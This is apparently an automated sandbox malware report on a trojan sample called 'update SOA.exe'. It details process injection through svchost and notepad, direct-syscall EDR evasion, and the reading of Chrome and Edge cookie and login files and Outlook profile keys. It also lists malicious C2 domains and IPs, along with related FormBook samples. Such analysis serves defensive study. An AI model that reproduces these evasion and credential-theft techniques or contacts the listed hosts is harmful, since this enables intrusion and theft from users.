            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC9179 mov eax, dword ptr fs:[00000030h]2_2_03AC9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05152 mov eax, dword ptr fs:[00000030h]2_2_03B05152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29148 mov eax, dword ptr fs:[00000030h]2_2_03A29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29148 mov eax, dword ptr fs:[00000030h]2_2_03A29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29148 mov eax, dword ptr fs:[00000030h]2_2_03A29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29148 mov eax, dword ptr fs:[00000030h]2_2_03A29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A37152 mov eax, dword ptr fs:[00000030h]2_2_03A37152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h]2_2_03A2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC8158 mov eax, dword ptr fs:[00000030h]2_2_03AC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC80A8 mov eax, dword ptr fs:[00000030h]2_2_03AC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h]2_2_03AF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03AF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h]2_2_03A3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D08D mov eax, dword ptr fs:[00000030h]2_2_03A2D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A35096 mov eax, dword ptr fs:[00000030h]2_2_03A35096

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\update SOA.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\notepad.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\notepad.exe Section loaded: NULL target: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe protection: read write
            Source: C:\Windows\SysWOW64\notepad.exe Section loaded: NULL target: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\notepad.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\notepad.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\notepad.exe Thread register set: target process: 4568
            Source: C:\Windows\SysWOW64\notepad.exe Thread APC queued: target process: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
            Source: C:\Users\user\Desktop\update SOA.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F55008
            Source: C:\Users\user\Desktop\update SOA.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\update SOA.exe"
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe Process created: C:\Windows\SysWOW64\notepad.exe "C:\Windows\SysWOW64\notepad.exe"
            Source: C:\Windows\SysWOW64\notepad.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: HAdkDWMZRiGMZe.exe, 00000004.00000002.3883262127.0000000001471000.00000002.00000001.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000004.00000000.2266594556.0000000001471000.00000002.00000001.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3883352596.00000000016D1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: HAdkDWMZRiGMZe.exe, 00000004.00000002.3883262127.0000000001471000.00000002.00000001.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000004.00000000.2266594556.0000000001471000.00000002.00000001.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3883352596.00000000016D1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: HAdkDWMZRiGMZe.exe, 00000004.00000002.3883262127.0000000001471000.00000002.00000001.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000004.00000000.2266594556.0000000001471000.00000002.00000001.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3883352596.00000000016D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: update SOA.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: HAdkDWMZRiGMZe.exe, 00000004.00000002.3883262127.0000000001471000.00000002.00000001.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000004.00000000.2266594556.0000000001471000.00000002.00000001.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3883352596.00000000016D1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3886044229.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2343906085.0000000006650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3883738653.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2343594491.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3883798608.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\notepad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\notepad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\notepad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\notepad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\notepad.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\notepad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\notepad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\notepad.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\notepad.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3886044229.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2343906085.0000000006650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3883738653.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2343594491.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3883798608.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            MITRE ATT&CK Matrix (a leading number is the count of matched signatures for that technique)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
            Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
            Privilege Escalation: 412 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
            Defense Evasion: 2 Virtualization/Sandbox Evasion; 412 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
            Discovery: 121 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 2 File and Directory Discovery; 12 System Information Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
            Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture
            Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
            Behavior Graph (ID: 1522849, Sample: update SOA.exe, Start date: 30/09/2024, Architecture: WINDOWS, Score: 100)
            Top-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures. Resolved at top level: www.weatherbook.live, www.technectar.top, 17 other IPs or domains.
            Process chain: update SOA.exe (started; Writes to foreign memory regions; Maps a DLL or memory area into another process) -> svchost.exe (started; Maps a DLL or memory area into another process) -> HAdkDWMZRiGMZe.exe (injected; Found direct / indirect Syscall (likely to bypass EDR)) -> notepad.exe (started; Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures) -> HAdkDWMZRiGMZe.exe (injected; Found direct / indirect Syscall (likely to bypass EDR)) and firefox.exe (started)
            Network from the injected HAdkDWMZRiGMZe.exe: dxzz.top 137.175.33.56, ports 49711, 80 (PEGTECHINCUS, United States); www.technectar.top 199.192.21.169, ports 49737, 49738, 49739 (NAMECHEAP-NETUS, United States); 3 other IPs or domains

            Antivirus detection (sample)
            Source | Detection | Scanner | Label
            update SOA.exe | 42% | ReversingLabs | Win32.Trojan.Autoitinject
            update SOA.exe | 100% | Joe Sandbox ML |
            No Antivirus matches

            URL reputation
            Source | Detection | Scanner | Label
            https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
            https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
            IP | Domain | Country | ASN | ASN Name | Malicious
            137.175.33.56 | dxzz.top | United States | 54600 | PEGTECHINCUS | true
            199.192.21.169 | www.technectar.top | United States | 22612 | NAMECHEAP-NETUS | true
            31.31.196.17 | www.dverkom.store | Russian Federation | 197695 | AS-REGRU | true
            188.114.96.3 | www.cc101.pro | European Union | 13335 | CLOUDFLARENETUS | true
            3.33.130.190 | bqberw.vip | United States | 8987 | AMAZONEXPANSIONGB | true
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1522849
                                                                                          Start date and time:2024-09-30 18:42:56 +02:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 8m 56s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Run name:Run with higher sleep bypass
                                                                                          Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:update SOA.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@7/2@11/5
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 25
• Number of non-executed functions: 320
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target HAdkDWMZRiGMZe.exe, PID 2296 because it is empty
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: update SOA.exe
Time | Type | Description
12:44:53 | API Interceptor | 6080652x Sleep call for process: notepad.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
137.175.33.56 | UMOWA_PD.BAT.exe | Get hash | malicious | FormBook, GuLoader | Browse | www.dxeg.lol/ytua/
137.175.33.56 | DCP11-83642024..exe | Get hash | malicious | FormBook | Browse | www.dxeg.lol/rkgs/
199.192.21.169 | NVOICE FOR THE MONTH OF AUG-24.exe | Get hash | malicious | FormBook | Browse | www.selftip.top/85su/
199.192.21.169 | RFQ - HTS45785-24-0907I000.exe | Get hash | malicious | FormBook | Browse | www.zenscape.top/d8cw/
199.192.21.169 | Request for Quotation Hi-Tech Park Project 193200.exe | Get hash | malicious | FormBook | Browse | www.zenscape.top/d8cw/
199.192.21.169 | DEBIT NOTE 01ST SEP 2024.exe | Get hash | malicious | FormBook | Browse | www.selftip.top/85su/
199.192.21.169 | DCP11-83642024..exe | Get hash | malicious | FormBook | Browse | www.urbanpulse.help/r50h/
199.192.21.169 | PROFOMA INVOICE SHEET.exe | Get hash | malicious | FormBook | Browse | www.selftip.top/85su/
199.192.21.169 | SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exe | Get hash | malicious | FormBook | Browse | www.zenscape.top/d8cw/
199.192.21.169 | file.exe | Get hash | malicious | FormBook | Browse | www.urbanpulse.help/r50h/
199.192.21.169 | INV & BANK DETAILS LETTER.pdf.exe | Get hash | malicious | FormBook | Browse | www.cenfresh.life/6iok/
31.31.196.17 | PO For Bulk Order.exe | Get hash | malicious | FormBook | Browse | www.dverkom.store/87kt/
31.31.196.17 | New Purchase Order.exe | Get hash | malicious | FormBook | Browse | www.dverkom.store/87kt/
188.114.96.3 | docs.exe | Get hash | malicious | FormBook | Browse | www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
188.114.96.3 | https://wwvmicrosx.live/office365/office_cookies/main | Get hash | malicious | HTMLPhisher | Browse | wwvmicrosx.live/office365/office_cookies/main/
